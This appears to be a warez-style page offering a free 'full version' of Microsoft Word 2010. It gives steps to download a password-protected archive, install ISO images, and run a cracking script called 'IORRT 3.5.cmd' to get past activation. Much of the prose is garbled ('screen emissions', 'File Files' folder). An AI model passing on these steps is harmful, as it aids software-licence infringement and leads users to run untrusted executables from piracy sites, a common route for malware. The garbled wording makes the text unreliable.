This article shows you how to download and install the full version of Microsoft Word 2010 for free on PC. Follow the download link and direct instructions below for instructions on installing Microsoft Word 2010 on your computer.
Microsoft Word 2010 is a 2010 edition of the software and bundled as important software in Office 2010. Word 2010 allows for more customization of the Ribbon, adds a Backstage view for file management, improved document navigation, allows creation and screen emissions. and join the Word Web App.
Microsoft Word 2010 System Requirements
The minimum system requirements for the 2010 office include: Intel Pentium III processor, 500 MHz; 256 MB PC100 SDRAM; and Windows XP Professional and Service Pack 3. In contrast, Office 2003 set up a 233 MHz processor and 128 MB of RAM.
How to Download and Install Microsoft Word 2010
- Press the download button below and complete the required download. This can take from a few minutes to a few hours, depending on your download speed.
- Capture the downloaded file. If you do not know how to extract, see this article. Keywords for extract will always be: www.Microsoftoutlookemails.com
- Open the "File Files" folder and install "Microsoft Office 2010 Word x64 64bit.iso" or "Microsoft Office 2010 Word x86 32bit.iso" (depending on whether you have a 32 or 64 bit system). If you do not know how to install the file, see this post,
- Run the setup and install Microsoft Word 2010.
- You now have the full version of Microsoft Word 2010, without any restrictions, installed on your computer.
- Notes: if they ask you to "activate", download this file, run "IORRT 3.5.cmd" and type the letter "A" to start installing. Then try launching the software again.
Files are required
File # 1 (588MB)